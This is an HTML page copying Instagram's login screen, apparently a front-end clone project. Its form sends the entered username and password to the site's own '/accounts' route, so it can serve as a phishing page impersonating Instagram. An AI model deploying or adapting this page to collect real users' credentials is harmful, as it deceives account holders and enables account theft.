<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <link rel="icon" href="imgs/insta-logo.jpg" />
    <link
      rel="stylesheet"
      href="https://use.fontawesome.com/releases/v5.7.0/css/all.css"
      integrity="sha384-lZN37f5QGtY3VHgisS14W3ExzMWZxybE1SJSEsQp9S+oqd12jhcu+A56Ebc1zFSJ"
      crossorigin="anonymous"
    />
    <link rel="stylesheet" href="style.css" />
    <title>Login . Instagram</title>
</head>
<body>
    <main>
        <form action="/accounts" method="POST" class="form-container">
            <img class="form-logo" src="imgs/igLogo.jpg" alt="..." >
            <input type="text" name="user[username]" placeholder="Phone number, username or email" class="form-input" required>
            <input type="password" name="user[password]" placeholder="Password" class="form-input" required>
            <button class="form-btn">Log In</button>
            <h3>OR</h3>
            <a href="#" class="fb-link"><i class="fab fa-facebook-square"></i><b>Log in with Facebook</b></a>
            <a href="#" class="pwd-link">Forgot password?</a>
        </form>
        <div class="sign-up">
            <h4>Don't have an account? <a href="#">Sign up</a></h4>
        </div>
        <div class="app-box">
            <p>Get the app.</p>
            <img class="app-img" src="imgs/ios-app.jpg" alt="..." >
            <img class="app-img" src="imgs/andriod-app.jpg" alt="..." >
        </div>
        <div class="footer">
            <ul class="footer-list">
                <li class="footer-item"><a href="#">Meta</a></li>
                <li class="footer-item"><a href="#">About</a></li>
                <li class="footer-item"><a href="#">Blog</a></li>
                <li class="footer-item"><a href="#">Jobs</a></li>
                <li class="footer-item"><a href="#">Help</a></li>
                <li class="footer-item"><a href="#">API</a></li>
                <li class="footer-item"><a href="#">Privacy</a></li>
                <li class="footer-item"><a href="#">Terms</a></li>
                <li class="footer-item"><a href="#">Top Accounts</a></li>
                <li class="footer-item"><a href="#">Hashtags</a></li>
                <li class="footer-item"><a href="#">Locations</a></li>
                <li class="footer-item"><a href="#">Instaram Lite</a></li>
            </ul>
            <p class="footer-text"><span>English <i class="fas fa-angle-down"></i></span>  © 2021 Instagram from Meta</p>
        </div>
    </main>
</body>
</html>